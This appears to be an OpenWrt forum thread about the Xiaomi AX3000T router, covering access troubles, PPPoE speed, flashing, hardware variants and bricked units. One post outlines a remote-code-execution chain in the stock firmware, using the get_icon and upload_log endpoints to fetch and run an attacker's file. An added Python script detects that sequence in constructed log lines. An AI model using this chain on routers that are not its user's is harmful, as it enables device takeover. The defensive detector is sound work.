OpenWrt support for Xiaomi AX3000T

No entry 192.168.1.1

It worked on another computer, but I can't access it from my main computer. Why?

Again, the solid blue light means everything is working normally. Try opening 192.168.1.1 in a different browser or in incognito mode. Restart your PC. To be sure, also check 192.168.31.1 in case the old firmware is still loaded. Be sure that only a middle port (2 or 3) is used on the router.

1 Like

There are a lot of reasons, and it is obviously off topic here. One of them could be that your main PC is already connected to another main router with the same subnet 192.168.1.0/24. Set your AX3000T IP to another (non-default) subnet like 192.168.2.1 and try to reach it.

Yes, the interface is opened on my main computer, thank you.

I am using a Xiaomi AX3000T router running the latest OpenWrt snapshot. My ISP connection is gigabit fiber with PPPoE authentication.

When I configure my ONT to handle PPPoE and use the AX3000T as a client router, I get close to full gigabit speed. However, when I switch the ONT to bridge mode and have the AX3000T handle the PPPoE authentication, my speed drops drastically to about 165 Mbps.

I have tried all the usual tuning: setting correct MTU, enabling and disabling hardware offloading and various firewall and QoS tweaks. None have improved the PPPoE throughput.

Interestingly, I observed a similar speed limitation with the stock Xiaomi firmware running PPPoE on the router. So this doesn't seem limited to OpenWrt or its snapshot builds.

Anyone encountered a similar problem?

The latest XMiR-Patcher supports a new vulnerability in get_icon (present only in INT firmwares).

All firmware for RD23 are supported by the patcher.

1 Like

Using stock firmware here, when dialing PPPoE, I can fully reach gigabit speed.
The same applies under NAT.

Stock version: 1.0.47

Ouch, another nasty exploit. Running the stock firmware is a major risk, if an attacker has gained web access (considering this and the other exploits allowing you to RCE).

This one: an attacker can upload any file to the router through /cgi-bin/luci/;stok=token/api/xqsystem/get_icon?ip=ip:port&name=filename, where ip:port is a man-in-the-middle HTTP server you are running that replies to GET on path filename. The file can be executed through /cgi-bin/luci/;stok=token/api/xqsystem/upload_log if you had written your file to /etc/diag_info/stat/firewall/.

3 Likes
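A defender's view of the sequence described in the post above, as an added example that is not part of the thread or of XMiR-Patcher: it scans access-log lines for a get_icon call carrying ip and name parameters, then flags an upload_log call from the same client. The log format, the sample lines and the function name are constructed assumptions; stock firmware may not log requests in this shape, so a reverse proxy or packet capture may be the actual data source.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in an assumed access-log shape:
# client [timestamp] "METHOD target PROTO" status
SAMPLE_LOG = """\
192.168.31.50 [10/Jul/2025:10:00:01] "GET /cgi-bin/luci/;stok=aaaa/api/xqsystem/get_icon?ip=192.168.31.50:8080&name=file1 HTTP/1.1" 200
192.168.31.50 [10/Jul/2025:10:00:05] "GET /cgi-bin/luci/;stok=aaaa/api/xqsystem/upload_log HTTP/1.1" 200
192.168.31.77 [10/Jul/2025:10:02:00] "GET /cgi-bin/luci/;stok=bbbb/api/xqsystem/upload_log HTTP/1.1" 200
192.168.31.77 [10/Jul/2025:10:03:00] "GET /cgi-bin/luci/;stok=bbbb/web/home HTTP/1.1" 200
"""

LINE_RE = re.compile(r'^(\S+) \[([^\]]+)\] "\S+ (\S+) [^"]*" \d{3}$')
# The two endpoints named in the post; the stok token is a path parameter.
API_RE = re.compile(r'^/cgi-bin/luci/;stok=[^/]+/api/xqsystem/(get_icon|upload_log)$')


def scan(log_text):
    """Return alert tuples: (rule, client, timestamp, fetch_server, filename)."""
    pending = {}  # client -> (fetch_server, filename) from its last get_icon
    alerts = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        client, when, target = m.groups()
        url = urlsplit(target)
        api = API_RE.match(url.path)
        if not api:
            continue
        if api.group(1) == "get_icon":
            query = parse_qs(url.query)
            server = query.get("ip", [""])[0]
            name = query.get("name", [""])[0]
            if server and name:
                # The router is being told to fetch a file from `server`.
                pending[client] = (server, name)
                alerts.append(("get_icon_remote_fetch", client, when, server, name))
        elif client in pending:
            # upload_log after a remote fetch matches the sequence in the post.
            server, name = pending.pop(client)
            alerts.append(("upload_log_after_get_icon", client, when, server, name))
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
```

An upload_log call on its own (the second client in the sample) is not flagged; only the pair from one client is.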

Thanks for the feedback and for researching how it works ))

The link mentioned in the commit is Russian, and I didn’t feel like trusting auto translate for this, so I went through your connect7.py script to see what this exploit was about and wrote a TL;DR in case someone wants to update the wiki.

Cool stuff, if you plan on installing OpenWrt without manufacturer support. Nasty stuff, if you are a normie running the stock firmware with basic/default web passwords.

2 Likes

This seller offers the RD03 model on the Mediatek Filogic 820 SoC, and if you click on the upgraded version, you will get the RD03v2.

And if they run out of the RD03 model, they'll send you the upgraded model at no extra charge...

Then simply send it back. Returns are free within 90 days.

WR3000S and WR3000E have the same hardware specs as the AX3000T, but with an extra ethernet port. Get those if you can find them for around the same price and you won’t have to deal with Xiaomi’s bullshit.

WR3000P is snapshot-only (for now), same SoC as the others, but an extra 256 of RAM, a USB port and the WAN port is 2.5 Gbps instead of 1.

2 Likes

The link is Russian, everything is written in Russian, I don’t speak Russian and auto translate sucks.

Is this so hard to understand? How about you take 5 minutes of your time to re-read my post, which clearly mentions not trusting auto translate, instead of berating others.

3 Likes

I tried using snapshot and the image from this fork, but after I install luci via ssh and load the image, I get the same result as 24.10.2, soft brick, it lights the orange LED, stays on, connect, then power off and on again.
To the people that made it work without using UART, did you take any other step? Should I erase FORESEE NAND chip before loading the image somehow?

Btw, after I brick it I just hard reset it (power on with reset button) and load the original firmware with the miwifi repair tool.

I have 3 routers RD03 all with FORESEE NAND where two of them are working properly with 24.10.1 while the last one got bricked due to bad blocks, the only way to recover it was UART and now is running the last release from dimfishr (same fork you mentioned).

I think I'm going to try it again, did you do anything differently with the last router? Did you use XMiR-Patcher by any chance?

I have used XMiR-Patcher on all of them, all working ok at first sight but the last router started hanging with small load and finally it got unable to login. The only difference was on that one I installed remittor’s firmware instead of the “OEM” openWRT, maybe it was the firmware (due to its size, larger than standard) or just the NAND that has the 1% probability.

Trying to recover with the official Xiaomi tool didn’t help, and finally it was restored using the UART method.